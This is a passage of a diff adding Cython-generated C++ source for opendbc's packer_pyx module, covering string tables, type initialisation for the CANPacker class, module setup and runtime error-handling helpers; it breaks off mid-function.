{&__pyx_n_s_values, __pyx_k_values, sizeof(__pyx_k_values), 0, 0, 1, 1}, + {0, 0, 0, 0, 0, 0, 0} + }; + return __Pyx_InitStrings(__pyx_string_tab); +} +/* #### Code section: cached_builtins ### */ +static CYTHON_SMALL_CODE int __Pyx_InitCachedBuiltins(void) { + __pyx_builtin_RuntimeError = __Pyx_GetBuiltinName(__pyx_n_s_RuntimeError); if (!__pyx_builtin_RuntimeError) __PYX_ERR(0, 22, __pyx_L1_error) + __pyx_builtin_range = __Pyx_GetBuiltinName(__pyx_n_s_range); if (!__pyx_builtin_range) __PYX_ERR(0, 25, __pyx_L1_error) + __pyx_builtin_TypeError = __Pyx_GetBuiltinName(__pyx_n_s_TypeError); if (!__pyx_builtin_TypeError) __PYX_ERR(1, 2, __pyx_L1_error) + return 0; + __pyx_L1_error:; + return -1; +} +/* #### Code section: cached_constants ### */ + +static CYTHON_SMALL_CODE int __Pyx_InitCachedConstants(void) { + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__Pyx_InitCachedConstants", 0); + + /* "opendbc/can/packer_pyx.pyx":41 + * return self.packer.pack(addr, values_thing) + * + * cpdef make_can_msg(self, name_or_addr, bus, values): # <<<<<<<<<<<<<< + * cdef int addr + * if type(name_or_addr) == int: + */ + __pyx_tuple_ = PyTuple_Pack(4, __pyx_n_s_self, __pyx_n_s_name_or_addr, __pyx_n_s_bus, __pyx_n_s_values); if (unlikely(!__pyx_tuple_)) __PYX_ERR(0, 41, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple_); + __Pyx_GIVEREF(__pyx_tuple_); + __pyx_codeobj__2 = (PyObject*)__Pyx_PyCode_New(4, 0, 0, 4, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple_, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_opendbc_can_packer_pyx_pyx, __pyx_n_s_make_can_msg, 41, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__2)) __PYX_ERR(0, 41, __pyx_L1_error) + + /* "(tree fragment)":1 + * def __reduce_cython__(self): # <<<<<<<<<<<<<< + * raise TypeError, "self.dbc,self.packer cannot be converted to a Python object for pickling" + * def __setstate_cython__(self, __pyx_state): + */ + __pyx_tuple__3 = PyTuple_Pack(1, __pyx_n_s_self); if (unlikely(!__pyx_tuple__3)) __PYX_ERR(1, 1, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__3); + __Pyx_GIVEREF(__pyx_tuple__3); + __pyx_codeobj__4 = (PyObject*)__Pyx_PyCode_New(1, 0, 0, 1, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__3, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_stringsource, __pyx_n_s_reduce_cython, 1, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__4)) __PYX_ERR(1, 1, __pyx_L1_error) + + /* "(tree fragment)":3 + * def __reduce_cython__(self): + * raise TypeError, "self.dbc,self.packer cannot be converted to a Python object for pickling" + * def __setstate_cython__(self, __pyx_state): # <<<<<<<<<<<<<< + * raise TypeError, "self.dbc,self.packer cannot be converted to a Python object for pickling" + */ + __pyx_tuple__5 = PyTuple_Pack(2, __pyx_n_s_self, __pyx_n_s_pyx_state); if (unlikely(!__pyx_tuple__5)) __PYX_ERR(1, 3, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__5); + __Pyx_GIVEREF(__pyx_tuple__5); + __pyx_codeobj__6 = (PyObject*)__Pyx_PyCode_New(2, 0, 0, 2, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__5, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_stringsource, __pyx_n_s_setstate_cython, 3, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__6)) __PYX_ERR(1, 3, __pyx_L1_error) + __Pyx_RefNannyFinishContext(); + return 0; + __pyx_L1_error:; + __Pyx_RefNannyFinishContext(); + return -1; +} +/* #### Code section: init_constants ### */ + +static CYTHON_SMALL_CODE int __Pyx_InitConstants(void) { + if (__Pyx_CreateStringTabAndInitStrings() < 0) __PYX_ERR(0, 1, __pyx_L1_error); + __pyx_int_0 = PyInt_FromLong(0); if (unlikely(!__pyx_int_0)) __PYX_ERR(0, 1, __pyx_L1_error) + return 0; + __pyx_L1_error:; + return -1; +} +/* #### Code section: init_globals ### */ + +static CYTHON_SMALL_CODE int __Pyx_InitGlobals(void) { + return 0; +} +/* #### Code section: init_module ### */ + +static CYTHON_SMALL_CODE int __Pyx_modinit_global_init_code(void); /*proto*/ +static CYTHON_SMALL_CODE int __Pyx_modinit_variable_export_code(void); /*proto*/ +static CYTHON_SMALL_CODE int __Pyx_modinit_function_export_code(void); /*proto*/ +static CYTHON_SMALL_CODE int __Pyx_modinit_type_init_code(void); /*proto*/ +static CYTHON_SMALL_CODE int __Pyx_modinit_type_import_code(void); /*proto*/ +static CYTHON_SMALL_CODE int __Pyx_modinit_variable_import_code(void); /*proto*/ +static CYTHON_SMALL_CODE int __Pyx_modinit_function_import_code(void); /*proto*/ + +static int __Pyx_modinit_global_init_code(void) { + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__Pyx_modinit_global_init_code", 0); + /*--- Global init code ---*/ + __Pyx_RefNannyFinishContext(); + return 0; +} + +static int __Pyx_modinit_variable_export_code(void) { + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__Pyx_modinit_variable_export_code", 0); + /*--- Variable export code ---*/ + __Pyx_RefNannyFinishContext(); + return 0; +} + +static int __Pyx_modinit_function_export_code(void) { + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__Pyx_modinit_function_export_code", 0); + /*--- Function export code ---*/ + __Pyx_RefNannyFinishContext(); + return 0; +} + +static int __Pyx_modinit_type_init_code(void) { + __Pyx_RefNannyDeclarations + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__Pyx_modinit_type_init_code", 0); + /*--- Type init code ---*/ + __pyx_vtabptr_7opendbc_3can_10packer_pyx_CANPacker = &__pyx_vtable_7opendbc_3can_10packer_pyx_CANPacker; + __pyx_vtable_7opendbc_3can_10packer_pyx_CANPacker.pack = (std::vector (*)(struct __pyx_obj_7opendbc_3can_10packer_pyx_CANPacker *, PyObject *, PyObject *))__pyx_f_7opendbc_3can_10packer_pyx_9CANPacker_pack; + __pyx_vtable_7opendbc_3can_10packer_pyx_CANPacker.make_can_msg = (PyObject *(*)(struct __pyx_obj_7opendbc_3can_10packer_pyx_CANPacker *, PyObject *, PyObject *, PyObject *, int __pyx_skip_dispatch))__pyx_f_7opendbc_3can_10packer_pyx_9CANPacker_make_can_msg; + #if CYTHON_USE_TYPE_SPECS + __pyx_ptype_7opendbc_3can_10packer_pyx_CANPacker = (PyTypeObject *) __Pyx_PyType_FromModuleAndSpec(__pyx_m, &__pyx_type_7opendbc_3can_10packer_pyx_CANPacker_spec, NULL); if (unlikely(!__pyx_ptype_7opendbc_3can_10packer_pyx_CANPacker)) __PYX_ERR(0, 13, __pyx_L1_error) + if (__Pyx_fix_up_extension_type_from_spec(&__pyx_type_7opendbc_3can_10packer_pyx_CANPacker_spec, __pyx_ptype_7opendbc_3can_10packer_pyx_CANPacker) < 0) __PYX_ERR(0, 13, __pyx_L1_error) + #else + __pyx_ptype_7opendbc_3can_10packer_pyx_CANPacker = &__pyx_type_7opendbc_3can_10packer_pyx_CANPacker; + #endif + #if !CYTHON_COMPILING_IN_LIMITED_API + #endif + #if !CYTHON_USE_TYPE_SPECS + if (__Pyx_PyType_Ready(__pyx_ptype_7opendbc_3can_10packer_pyx_CANPacker) < 0) __PYX_ERR(0, 13, __pyx_L1_error) + #endif + #if PY_MAJOR_VERSION < 3 + __pyx_ptype_7opendbc_3can_10packer_pyx_CANPacker->tp_print = 0; + #endif + #if !CYTHON_COMPILING_IN_LIMITED_API + if ((CYTHON_USE_TYPE_SLOTS && CYTHON_USE_PYTYPE_LOOKUP) && likely(!__pyx_ptype_7opendbc_3can_10packer_pyx_CANPacker->tp_dictoffset && __pyx_ptype_7opendbc_3can_10packer_pyx_CANPacker->tp_getattro == PyObject_GenericGetAttr)) { + __pyx_ptype_7opendbc_3can_10packer_pyx_CANPacker->tp_getattro = __Pyx_PyObject_GenericGetAttr; + } + #endif + if (__Pyx_SetVtable(__pyx_ptype_7opendbc_3can_10packer_pyx_CANPacker, __pyx_vtabptr_7opendbc_3can_10packer_pyx_CANPacker) < 0) __PYX_ERR(0, 13, __pyx_L1_error) + #if !CYTHON_COMPILING_IN_LIMITED_API + if (__Pyx_MergeVtables(__pyx_ptype_7opendbc_3can_10packer_pyx_CANPacker) < 0) __PYX_ERR(0, 13, __pyx_L1_error) + #endif + if (PyObject_SetAttr(__pyx_m, __pyx_n_s_CANPacker, (PyObject *) __pyx_ptype_7opendbc_3can_10packer_pyx_CANPacker) < 0) __PYX_ERR(0, 13, __pyx_L1_error) + #if !CYTHON_COMPILING_IN_LIMITED_API + if (__Pyx_setup_reduce((PyObject *) __pyx_ptype_7opendbc_3can_10packer_pyx_CANPacker) < 0) __PYX_ERR(0, 13, __pyx_L1_error) + #endif + __Pyx_RefNannyFinishContext(); + return 0; + __pyx_L1_error:; + __Pyx_RefNannyFinishContext(); + return -1; +} + +static int __Pyx_modinit_type_import_code(void) { + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__Pyx_modinit_type_import_code", 0); + /*--- Type import code ---*/ + __Pyx_RefNannyFinishContext(); + return 0; +} + +static int __Pyx_modinit_variable_import_code(void) { + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__Pyx_modinit_variable_import_code", 0); + /*--- Variable import code ---*/ + __Pyx_RefNannyFinishContext(); + return 0; +} + +static int __Pyx_modinit_function_import_code(void) { + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__Pyx_modinit_function_import_code", 0); + /*--- Function import code ---*/ + __Pyx_RefNannyFinishContext(); + return 0; +} + + +#if PY_MAJOR_VERSION >= 3 +#if CYTHON_PEP489_MULTI_PHASE_INIT +static PyObject* __pyx_pymod_create(PyObject *spec, PyModuleDef *def); /*proto*/ +static int __pyx_pymod_exec_packer_pyx(PyObject* module); /*proto*/ +static PyModuleDef_Slot __pyx_moduledef_slots[] = { + {Py_mod_create, (void*)__pyx_pymod_create}, + {Py_mod_exec, (void*)__pyx_pymod_exec_packer_pyx}, + {0, NULL} +}; +#endif + +#ifdef __cplusplus +namespace { + struct PyModuleDef __pyx_moduledef = + #else + static struct PyModuleDef __pyx_moduledef = + #endif + { + PyModuleDef_HEAD_INIT, + "packer_pyx", + 0, /* m_doc */ + #if CYTHON_PEP489_MULTI_PHASE_INIT + 0, /* m_size */ + #elif CYTHON_USE_MODULE_STATE + sizeof(__pyx_mstate), /* m_size */ + #else + -1, /* m_size */ + #endif + __pyx_methods /* m_methods */, + #if CYTHON_PEP489_MULTI_PHASE_INIT + __pyx_moduledef_slots, /* m_slots */ + #else + NULL, /* m_reload */ + #endif + #if CYTHON_USE_MODULE_STATE + __pyx_m_traverse, /* m_traverse */ + __pyx_m_clear, /* m_clear */ + NULL /* m_free */ + #else + NULL, /* m_traverse */ + NULL, /* m_clear */ + NULL /* m_free */ + #endif + }; + #ifdef __cplusplus +} /* anonymous namespace */ +#endif +#endif + +#ifndef CYTHON_NO_PYINIT_EXPORT +#define __Pyx_PyMODINIT_FUNC PyMODINIT_FUNC +#elif PY_MAJOR_VERSION < 3 +#ifdef __cplusplus +#define __Pyx_PyMODINIT_FUNC extern "C" void +#else +#define __Pyx_PyMODINIT_FUNC void +#endif +#else +#ifdef __cplusplus +#define __Pyx_PyMODINIT_FUNC extern "C" PyObject * +#else +#define __Pyx_PyMODINIT_FUNC PyObject * +#endif +#endif + + +#if PY_MAJOR_VERSION < 3 +__Pyx_PyMODINIT_FUNC initpacker_pyx(void) CYTHON_SMALL_CODE; /*proto*/ +__Pyx_PyMODINIT_FUNC initpacker_pyx(void) +#else +__Pyx_PyMODINIT_FUNC PyInit_packer_pyx(void) CYTHON_SMALL_CODE; /*proto*/ +__Pyx_PyMODINIT_FUNC PyInit_packer_pyx(void) +#if CYTHON_PEP489_MULTI_PHASE_INIT +{ + return PyModuleDef_Init(&__pyx_moduledef); +} +static CYTHON_SMALL_CODE int __Pyx_check_single_interpreter(void) { + #if PY_VERSION_HEX >= 0x030700A1 + static PY_INT64_T main_interpreter_id = -1; + PY_INT64_T current_id = PyInterpreterState_GetID(PyThreadState_Get()->interp); + if (main_interpreter_id == -1) { + main_interpreter_id = current_id; + return (unlikely(current_id == -1)) ? -1 : 0; + } else if (unlikely(main_interpreter_id != current_id)) + #else + static PyInterpreterState *main_interpreter = NULL; + PyInterpreterState *current_interpreter = PyThreadState_Get()->interp; + if (!main_interpreter) { + main_interpreter = current_interpreter; + } else if (unlikely(main_interpreter != current_interpreter)) + #endif + { + PyErr_SetString( + PyExc_ImportError, + "Interpreter change detected - this module can only be loaded into one interpreter per process."); + return -1; + } + return 0; +} +#if CYTHON_COMPILING_IN_LIMITED_API +static CYTHON_SMALL_CODE int __Pyx_copy_spec_to_module(PyObject *spec, PyObject *module, const char* from_name, const char* to_name, int allow_none) +#else +static CYTHON_SMALL_CODE int __Pyx_copy_spec_to_module(PyObject *spec, PyObject *moddict, const char* from_name, const char* to_name, int allow_none) +#endif +{ + PyObject *value = PyObject_GetAttrString(spec, from_name); + int result = 0; + if (likely(value)) { + if (allow_none || value != Py_None) { +#if CYTHON_COMPILING_IN_LIMITED_API + result = PyModule_AddObject(module, to_name, value); +#else + result = PyDict_SetItemString(moddict, to_name, value); +#endif + } + Py_DECREF(value); + } else if (PyErr_ExceptionMatches(PyExc_AttributeError)) { + PyErr_Clear(); + } else { + result = -1; + } + return result; +} +static CYTHON_SMALL_CODE PyObject* __pyx_pymod_create(PyObject *spec, PyModuleDef *def) { + PyObject *module = NULL, *moddict, *modname; + CYTHON_UNUSED_VAR(def); + if (__Pyx_check_single_interpreter()) + return NULL; + if (__pyx_m) + return __Pyx_NewRef(__pyx_m); + modname = PyObject_GetAttrString(spec, "name"); + if (unlikely(!modname)) goto bad; + module = PyModule_NewObject(modname); + Py_DECREF(modname); + if (unlikely(!module)) goto bad; +#if CYTHON_COMPILING_IN_LIMITED_API + moddict = module; +#else + moddict = PyModule_GetDict(module); + if (unlikely(!moddict)) goto bad; +#endif + if (unlikely(__Pyx_copy_spec_to_module(spec, moddict, "loader", "__loader__", 1) < 0)) goto bad; + if (unlikely(__Pyx_copy_spec_to_module(spec, moddict, "origin", "__file__", 1) < 0)) goto bad; + if (unlikely(__Pyx_copy_spec_to_module(spec, moddict, "parent", "__package__", 1) < 0)) goto bad; + if (unlikely(__Pyx_copy_spec_to_module(spec, moddict, "submodule_search_locations", "__path__", 0) < 0)) goto bad; + return module; +bad: + Py_XDECREF(module); + return NULL; +} + + +static CYTHON_SMALL_CODE int __pyx_pymod_exec_packer_pyx(PyObject *__pyx_pyinit_module) +#endif +#endif +{ + int stringtab_initialized = 0; + #if CYTHON_USE_MODULE_STATE + int pystate_addmodule_run = 0; + #endif + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannyDeclarations + #if CYTHON_PEP489_MULTI_PHASE_INIT + if (__pyx_m) { + if (__pyx_m == __pyx_pyinit_module) return 0; + PyErr_SetString(PyExc_RuntimeError, "Module 'packer_pyx' has already been imported. Re-initialisation is not supported."); + return -1; + } + #elif PY_MAJOR_VERSION >= 3 + if (__pyx_m) return __Pyx_NewRef(__pyx_m); + #endif + /*--- Module creation code ---*/ + #if CYTHON_PEP489_MULTI_PHASE_INIT + __pyx_m = __pyx_pyinit_module; + Py_INCREF(__pyx_m); + #else + #if PY_MAJOR_VERSION < 3 + __pyx_m = Py_InitModule4("packer_pyx", __pyx_methods, 0, 0, PYTHON_API_VERSION); Py_XINCREF(__pyx_m); + if (unlikely(!__pyx_m)) __PYX_ERR(0, 1, __pyx_L1_error) + #elif CYTHON_USE_MODULE_STATE + __pyx_t_1 = PyModule_Create(&__pyx_moduledef); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1, __pyx_L1_error) + { + int add_module_result = PyState_AddModule(__pyx_t_1, &__pyx_moduledef); + __pyx_t_1 = 0; /* transfer ownership from __pyx_t_1 to packer_pyx pseudovariable */ + if (unlikely((add_module_result < 0))) __PYX_ERR(0, 1, __pyx_L1_error) + pystate_addmodule_run = 1; + } + #else + __pyx_m = PyModule_Create(&__pyx_moduledef); + if (unlikely(!__pyx_m)) __PYX_ERR(0, 1, __pyx_L1_error) + #endif + #endif + CYTHON_UNUSED_VAR(__pyx_t_1); + __pyx_d = PyModule_GetDict(__pyx_m); if (unlikely(!__pyx_d)) __PYX_ERR(0, 1, __pyx_L1_error) + Py_INCREF(__pyx_d); + __pyx_b = PyImport_AddModule(__Pyx_BUILTIN_MODULE_NAME); if (unlikely(!__pyx_b)) __PYX_ERR(0, 1, __pyx_L1_error) + Py_INCREF(__pyx_b); + __pyx_cython_runtime = PyImport_AddModule((char *) "cython_runtime"); if (unlikely(!__pyx_cython_runtime)) __PYX_ERR(0, 1, __pyx_L1_error) + Py_INCREF(__pyx_cython_runtime); + if (PyObject_SetAttrString(__pyx_m, "__builtins__", __pyx_b) < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #if CYTHON_REFNANNY +__Pyx_RefNanny = __Pyx_RefNannyImportAPI("refnanny"); +if (!__Pyx_RefNanny) { + PyErr_Clear(); + __Pyx_RefNanny = __Pyx_RefNannyImportAPI("Cython.Runtime.refnanny"); + if (!__Pyx_RefNanny) + Py_FatalError("failed to import 'refnanny' module"); +} +#endif + __Pyx_RefNannySetupContext("__Pyx_PyMODINIT_FUNC PyInit_packer_pyx(void)", 0); + if (__Pyx_check_binary_version() < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #ifdef __Pxy_PyFrame_Initialize_Offsets + __Pxy_PyFrame_Initialize_Offsets(); + #endif + __pyx_empty_tuple = PyTuple_New(0); if (unlikely(!__pyx_empty_tuple)) __PYX_ERR(0, 1, __pyx_L1_error) + __pyx_empty_bytes = PyBytes_FromStringAndSize("", 0); if (unlikely(!__pyx_empty_bytes)) __PYX_ERR(0, 1, __pyx_L1_error) + __pyx_empty_unicode = PyUnicode_FromStringAndSize("", 0); if (unlikely(!__pyx_empty_unicode)) __PYX_ERR(0, 1, __pyx_L1_error) + #ifdef __Pyx_CyFunction_USED + if (__pyx_CyFunction_init(__pyx_m) < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #endif + #ifdef __Pyx_FusedFunction_USED + if (__pyx_FusedFunction_init(__pyx_m) < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #endif + #ifdef __Pyx_Coroutine_USED + if (__pyx_Coroutine_init(__pyx_m) < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #endif + #ifdef __Pyx_Generator_USED + if (__pyx_Generator_init(__pyx_m) < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #endif + #ifdef __Pyx_AsyncGen_USED + if (__pyx_AsyncGen_init(__pyx_m) < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #endif + #ifdef __Pyx_StopAsyncIteration_USED + if (__pyx_StopAsyncIteration_init(__pyx_m) < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #endif + /*--- Library function declarations ---*/ + /*--- Threads initialization code ---*/ + #if defined(WITH_THREAD) && PY_VERSION_HEX < 0x030700F0 && defined(__PYX_FORCE_INIT_THREADS) && __PYX_FORCE_INIT_THREADS + PyEval_InitThreads(); + #endif + /*--- Initialize various global constants etc. ---*/ + if (__Pyx_InitConstants() < 0) __PYX_ERR(0, 1, __pyx_L1_error) + stringtab_initialized = 1; + if (__Pyx_InitGlobals() < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #if PY_MAJOR_VERSION < 3 && (__PYX_DEFAULT_STRING_ENCODING_IS_ASCII || __PYX_DEFAULT_STRING_ENCODING_IS_DEFAULT) + if (__Pyx_init_sys_getdefaultencoding_params() < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #endif + if (__pyx_module_is_main_opendbc__can__packer_pyx) { + if (PyObject_SetAttr(__pyx_m, __pyx_n_s_name, __pyx_n_s_main) < 0) __PYX_ERR(0, 1, __pyx_L1_error) + } + #if PY_MAJOR_VERSION >= 3 + { + PyObject *modules = PyImport_GetModuleDict(); if (unlikely(!modules)) __PYX_ERR(0, 1, __pyx_L1_error) + if (!PyDict_GetItemString(modules, "opendbc.can.packer_pyx")) { + if (unlikely((PyDict_SetItemString(modules, "opendbc.can.packer_pyx", __pyx_m) < 0))) __PYX_ERR(0, 1, __pyx_L1_error) + } + } + #endif + /*--- Builtin init code ---*/ + if (__Pyx_InitCachedBuiltins() < 0) __PYX_ERR(0, 1, __pyx_L1_error) + /*--- Constants init code ---*/ + if (__Pyx_InitCachedConstants() < 0) __PYX_ERR(0, 1, __pyx_L1_error) + /*--- Global type/function init code ---*/ + (void)__Pyx_modinit_global_init_code(); + (void)__Pyx_modinit_variable_export_code(); + (void)__Pyx_modinit_function_export_code(); + if (unlikely((__Pyx_modinit_type_init_code() < 0))) __PYX_ERR(0, 1, __pyx_L1_error) + (void)__Pyx_modinit_type_import_code(); + (void)__Pyx_modinit_variable_import_code(); + (void)__Pyx_modinit_function_import_code(); + /*--- Execution code ---*/ + #if defined(__Pyx_Generator_USED) || defined(__Pyx_Coroutine_USED) + if (__Pyx_patch_abc() < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #endif + + /* "opendbc/can/packer_pyx.pyx":41 + * return self.packer.pack(addr, values_thing) + * + * cpdef make_can_msg(self, name_or_addr, bus, values): # <<<<<<<<<<<<<< + * cdef int addr + * if type(name_or_addr) == int: + */ + __pyx_t_2 = __Pyx_CyFunction_New(&__pyx_mdef_7opendbc_3can_10packer_pyx_9CANPacker_3make_can_msg, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_CANPacker_make_can_msg, NULL, __pyx_n_s_opendbc_can_packer_pyx, __pyx_d, ((PyObject *)__pyx_codeobj__2)); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 41, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + if (PyDict_SetItem((PyObject *)__pyx_ptype_7opendbc_3can_10packer_pyx_CANPacker->tp_dict, __pyx_n_s_make_can_msg, __pyx_t_2) < 0) __PYX_ERR(0, 41, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + PyType_Modified(__pyx_ptype_7opendbc_3can_10packer_pyx_CANPacker); + + /* "(tree fragment)":1 + * def __reduce_cython__(self): # <<<<<<<<<<<<<< + * raise TypeError, "self.dbc,self.packer cannot be converted to a Python object for pickling" + * def __setstate_cython__(self, __pyx_state): + */ + __pyx_t_2 = __Pyx_CyFunction_New(&__pyx_mdef_7opendbc_3can_10packer_pyx_9CANPacker_5__reduce_cython__, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_CANPacker___reduce_cython, NULL, __pyx_n_s_opendbc_can_packer_pyx, __pyx_d, ((PyObject *)__pyx_codeobj__4)); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 1, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + if (PyDict_SetItem(__pyx_d, __pyx_n_s_reduce_cython, __pyx_t_2) < 0) __PYX_ERR(1, 1, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + + /* "(tree fragment)":3 + * def __reduce_cython__(self): + * raise TypeError, "self.dbc,self.packer cannot be converted to a Python object for pickling" + * def __setstate_cython__(self, __pyx_state): # <<<<<<<<<<<<<< + * raise TypeError, "self.dbc,self.packer cannot be converted to a Python object for pickling" + */ + __pyx_t_2 = __Pyx_CyFunction_New(&__pyx_mdef_7opendbc_3can_10packer_pyx_9CANPacker_7__setstate_cython__, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_CANPacker___setstate_cython, NULL, __pyx_n_s_opendbc_can_packer_pyx, __pyx_d, ((PyObject *)__pyx_codeobj__6)); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 3, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + if (PyDict_SetItem(__pyx_d, __pyx_n_s_setstate_cython, __pyx_t_2) < 0) __PYX_ERR(1, 3, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + + /* "opendbc/can/packer_pyx.pyx":1 + * # distutils: language = c++ # <<<<<<<<<<<<<< + * # cython: c_string_encoding=ascii, language_level=3 + * + */ + __pyx_t_2 = __Pyx_PyDict_NewPresized(0); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + if (PyDict_SetItem(__pyx_d, __pyx_n_s_test, __pyx_t_2) < 0) __PYX_ERR(0, 1, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + + /*--- Wrapped vars code ---*/ + + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_2); + if (__pyx_m) { + if (__pyx_d && stringtab_initialized) { + __Pyx_AddTraceback("init opendbc.can.packer_pyx", __pyx_clineno, __pyx_lineno, __pyx_filename); + } + #if !CYTHON_USE_MODULE_STATE + Py_CLEAR(__pyx_m); + #else + Py_DECREF(__pyx_m); + if (pystate_addmodule_run) { + PyObject *tp, *value, *tb; + PyErr_Fetch(&tp, &value, &tb); + PyState_RemoveModule(&__pyx_moduledef); + PyErr_Restore(tp, value, tb); + } + #endif + } else if (!PyErr_Occurred()) { + PyErr_SetString(PyExc_ImportError, "init opendbc.can.packer_pyx"); + } + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + #if CYTHON_PEP489_MULTI_PHASE_INIT + return (__pyx_m != NULL) ? 0 : -1; + #elif PY_MAJOR_VERSION >= 3 + return __pyx_m; + #else + return; + #endif +} +/* #### Code section: cleanup_globals ### */ +/* #### Code section: cleanup_module ### */ +/* #### Code section: main_method ### */ +/* #### Code section: utility_code_pragmas ### */ +#ifdef _MSC_VER +#pragma warning( push ) +/* Warning 4127: conditional expression is constant + * Cython uses constant conditional expressions to allow in inline functions to be optimized at + * compile-time, so this warning is not useful + */ +#pragma warning( disable : 4127 ) +#endif + + + +/* #### Code section: utility_code_def ### */ + +/* --- Runtime support code --- */ +/* Refnanny */ +#if CYTHON_REFNANNY +static __Pyx_RefNannyAPIStruct *__Pyx_RefNannyImportAPI(const char *modname) { + PyObject *m = NULL, *p = NULL; + void *r = NULL; + m = PyImport_ImportModule(modname); + if (!m) goto end; + p = PyObject_GetAttrString(m, "RefNannyAPI"); + if (!p) goto end; + r = PyLong_AsVoidPtr(p); +end: + Py_XDECREF(p); + Py_XDECREF(m); + return (__Pyx_RefNannyAPIStruct *)r; +} +#endif + +/* PyErrExceptionMatches */ +#if CYTHON_FAST_THREAD_STATE +static int __Pyx_PyErr_ExceptionMatchesTuple(PyObject *exc_type, PyObject *tuple) { + Py_ssize_t i, n; + n = PyTuple_GET_SIZE(tuple); +#if PY_MAJOR_VERSION >= 3 + for (i=0; i= 0x030C00A6 + PyObject *current_exception = tstate->current_exception; + if (unlikely(!current_exception)) return 0; + exc_type = (PyObject*) Py_TYPE(current_exception); + if (exc_type == err) return 1; +#else + exc_type = tstate->curexc_type; + if (exc_type == err) return 1; + if (unlikely(!exc_type)) return 0; +#endif + #if CYTHON_AVOID_BORROWED_REFS + Py_INCREF(exc_type); + #endif + if (unlikely(PyTuple_Check(err))) { + result = __Pyx_PyErr_ExceptionMatchesTuple(exc_type, err); + } else { + result = __Pyx_PyErr_GivenExceptionMatches(exc_type, err); + } + #if CYTHON_AVOID_BORROWED_REFS + Py_DECREF(exc_type); + #endif + return result; +} +#endif + +/* PyErrFetchRestore */ +#if CYTHON_FAST_THREAD_STATE +static CYTHON_INLINE void __Pyx_ErrRestoreInState(PyThreadState *tstate, PyObject *type, PyObject *value, PyObject *tb) { +#if PY_VERSION_HEX >= 0x030C00A6 + PyObject *tmp_value; + assert(type == NULL || (value != NULL && type == (PyObject*) Py_TYPE(value))); + if (value) { + #if CYTHON_COMPILING_IN_CPYTHON + if (unlikely(((PyBaseExceptionObject*) value)->traceback != tb)) + #endif + PyException_SetTraceback(value, tb); + } + tmp_value = tstate->current_exception; + tstate->current_exception = value; + Py_XDECREF(tmp_value); +#else + PyObject *tmp_type, *tmp_value, *tmp_tb; + tmp_type = tstate->curexc_type; + tmp_value = tstate->curexc_value; + tmp_tb = tstate->curexc_traceback; + tstate->curexc_type = type; + tstate->curexc_value = value; + tstate->curexc_traceback = tb; + Py_XDECREF(tmp_type); + Py_XDECREF(tmp_value); + Py_XDECREF(tmp_tb); +#endif +} +static CYTHON_INLINE void __Pyx_ErrFetchInState(PyThreadState *tstate, PyObject **type, PyObject **value, PyObject **tb) { +#if PY_VERSION_HEX >= 0x030C00A6 + PyObject* exc_value; + exc_value = tstate->current_exception; + tstate->current_exception = 0; + *value = exc_value; + *type = NULL; + *tb = NULL; + if (exc_value) { + *type = (PyObject*) Py_TYPE(exc_value); + Py_INCREF(*type); + #if CYTHON_COMPILING_IN_CPYTHON + *tb = ((PyBaseExceptionObject*) exc_value)->traceback; + Py_XINCREF(*tb); + #else + *tb = PyException_GetTraceback(exc_value); + #endif + } +#else + *type = 